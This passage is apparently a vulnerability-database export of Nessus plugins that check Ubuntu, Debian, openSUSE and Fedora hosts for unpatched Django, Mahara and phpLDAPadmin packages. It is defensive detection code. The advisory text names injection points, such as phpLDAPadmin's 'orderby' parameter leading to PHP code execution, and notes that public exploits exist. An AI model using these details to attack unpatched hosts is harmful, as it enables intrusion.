exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"python-django-1.2.7-6.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-django\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-01T07:14:32", "description": "Pall McMillan discovered that Django used the root namespace when\nstoring cached session data. A remote attacker could exploit this to\nmodify sessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary\nURLs when the application used URLFields. This could be exploited by a\nremote attacker to cause a denial of service via resource exhaustion.\n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of\na URL via a HEAD request, it would instead use a GET request for the\ntarget of a redirect. This could potentially be used to trigger\narbitrary GET requests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP\nHost header to construct a full URL. A remote attacker could exploit\nthis to conduct host header cache poisoning attacks via a crafted\nrequest. (CVE-2011-4139).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2011-12-09T00:00:00", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : python-django vulnerabilities (USN-1297-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4136", "CVE-2011-4137", "CVE-2011-4138", "CVE-2011-4139"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "p-cpe:/a:canonical:ubuntu_linux:python-django", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:10.10"], "id": "UBUNTU_USN-1297-1.NASL", "href": "https://www.tenable.com/plugins/nessus/57061", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1297-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57061);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-4136\", \"CVE-2011-4137\", \"CVE-2011-4138\", \"CVE-2011-4139\");\n script_bugtraq_id(49573);\n script_xref(name:\"USN\", value:\"1297-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : python-django vulnerabilities (USN-1297-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pall McMillan discovered that Django used the root namespace when\nstoring cached session data. A remote attacker could exploit this to\nmodify sessions. (CVE-2011-4136)\n\nPaul McMillan discovered that Django would not timeout on arbitrary\nURLs when the application used URLFields. This could be exploited by a\nremote attacker to cause a denial of service via resource exhaustion.\n(CVE-2011-4137)\n\nPaul McMillan discovered that while Django would check the validity of\na URL via a HEAD request, it would instead use a GET request for the\ntarget of a redirect. This could potentially be used to trigger\narbitrary GET requests via a crafted Location header. (CVE-2011-4138)\n\nIt was discovered that Django would sometimes use a request's HTTP\nHost header to construct a full URL. A remote attacker could exploit\nthis to conduct host header cache poisoning attacks via a crafted\nrequest. (CVE-2011-4139).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1297-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python-django package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:python-django\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"python-django\", pkgver:\"1.1.1-2ubuntu1.4\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"python-django\", pkgver:\"1.2.3-1ubuntu0.2.10.10.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"python-django\", pkgver:\"1.2.5-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"python-django\", pkgver:\"1.3-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-django\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-12T09:47:05", "description": "Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder :\n\n - CVE-2011-2771\n Teemu Vesala discovered that missing input sanitising of\n RSS feeds could lead to cross-site scripting.\n\n - CVE-2011-2772\n Richard Mansfield discovered that insufficient upload\n restrictions allowed denial of service.\n\n - CVE-2011-2773\n Richard Mansfield discovered that the management of\n institutions was prone to cross-site request forgery.\n\n - (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation\n vulnerability in MNet handling.", "edition": 16, "published": "2011-11-07T00:00:00", "title": "Debian DSA-2334-1 : mahara - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2773", "CVE-2011-2772", "CVE-2011-2771"], "modified": "2011-11-07T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:mahara"], "id": "DEBIAN_DSA-2334.NASL", "href": "https://www.tenable.com/plugins/nessus/56714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2334. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56714);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2771\", \"CVE-2011-2772\", \"CVE-2011-2773\");\n script_xref(name:\"DSA\", value:\"2334\");\n\n script_name(english:\"Debian DSA-2334-1 : mahara - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Mahara, an electronic\nportfolio, weblog, and resume builder :\n\n - CVE-2011-2771\n Teemu Vesala discovered that missing input sanitising of\n RSS feeds could lead to cross-site scripting.\n\n - CVE-2011-2772\n Richard Mansfield discovered that insufficient upload\n restrictions allowed denial of service.\n\n - CVE-2011-2773\n Richard Mansfield discovered that the management of\n institutions was prone to cross-site request forgery.\n\n - (no CVE ID available yet)\n\n Andrew Nichols discovered a privilege escalation\n vulnerability in MNet handling.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2771\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2772\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2773\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/mahara\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2334\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mahara packages.\n\nFor the oldstable distribution (lenny), this problem has been fixed in\nversion 1.0.4-4+lenny11.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1.2.6-2+squeeze3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mahara\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"mahara\", reference:\"1.0.4-4+lenny11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara\", reference:\"1.2.6-2+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara-apache2\", reference:\"1.2.6-2+squeeze3\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"mahara-mediaplayer\", reference:\"1.2.6-2+squeeze3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:17", "description": "Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2011-11-26T00:00:00", "title": "Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-26T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpldapadmin", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-14993.NASL", "href": "https://www.tenable.com/plugins/nessus/56936", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14993.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56936);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14993\");\n\n script_name(english:\"Fedora 15 : phpldapadmin-1.2.1.1-2.20111006git.fc15 (2011-14993)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069777.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddff2581\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"phpldapadmin-1.2.1.1-2.20111006git.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpldapadmin\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:47:05", "description": "Two vulnerabilities have been discovered in phpLDAPadmin, a web-based\ninterface for administering LDAP servers. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2011-4074\n Input appended to the URL in cmd.php (when 'cmd' is set\n to '_debug') is not properly sanitised before being\n returned to the user. This can be exploited to execute\n arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n\n - CVE-2011-4075\n Input passed to the 'orderby' parameter in cmd.php (when\n 'cmd' is set to'query_engine', 'query' is set to 'none',\n and 'search' is set to e.g.'1') is not properly\n sanitised in lib/functions.php before being used in\n a'create_function()' function call. This can be\n exploited to inject and execute arbitrary PHP code.", "edition": 20, "published": "2011-10-31T00:00:00", "title": "Debian DSA-2333-1 : phpldapadmin - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-10-31T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:phpldapadmin"], "id": "DEBIAN_DSA-2333.NASL", "href": "https://www.tenable.com/plugins/nessus/56672", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2333. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56672);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_bugtraq_id(50331);\n script_xref(name:\"DSA\", value:\"2333\");\n\n script_name(english:\"Debian DSA-2333-1 : phpldapadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two vulnerabilities have been discovered in phpLDAPadmin, a web-based\ninterface for administering LDAP servers. The Common Vulnerabilities\nand Exposures project identifies the following problems :\n\n - CVE-2011-4074\n Input appended to the URL in cmd.php (when 'cmd' is set\n to '_debug') is not properly sanitised before being\n returned to the user. This can be exploited to execute\n arbitrary HTML and script code in a user's browser\n session in context of an affected site.\n\n - CVE-2011-4075\n Input passed to the 'orderby' parameter in cmd.php (when\n 'cmd' is set to'query_engine', 'query' is set to 'none',\n and 'search' is set to e.g.'1') is not properly\n sanitised in lib/functions.php before being used in\n a'create_function()' function call. This can be\n exploited to inject and execute arbitrary PHP code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=646754\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4074\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-4075\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/phpldapadmin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2333\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpldapadmin packages.\n\nFor the oldstable distribution (lenny), these problems have been fixed\nin version 1.1.0.5-6+lenny2.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 1.2.0.5-2+squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"phpldapadmin\", reference:\"1.1.0.5-6+lenny2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"phpldapadmin\", reference:\"1.2.0.5-2+squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:16", "description": "Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "published": "2011-11-26T00:00:00", "title": "Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4074", "CVE-2011-4075"], "modified": "2011-11-26T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:phpldapadmin"], "id": "FEDORA_2011-14924.NASL", "href": "https://www.tenable.com/plugins/nessus/56934", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-14924.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56934);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-4074\", \"CVE-2011-4075\");\n script_xref(name:\"FEDORA\", value:\"2011-14924\");\n\n script_name(english:\"Fedora 16 : phpldapadmin-1.2.1.1-2.20111006git.fc16 (2011-14924)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream development code to fix CVE-2011-4074\nand CVE-2011-4075 (XSS and code injection vulnerabilities in versions\n<= 1.2.1.1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=748537\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-November/069708.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?84bb798e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpldapadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpLDAPadmin 1.2.1.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpLDAPadmin query_engine Remote PHP Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpldapadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n 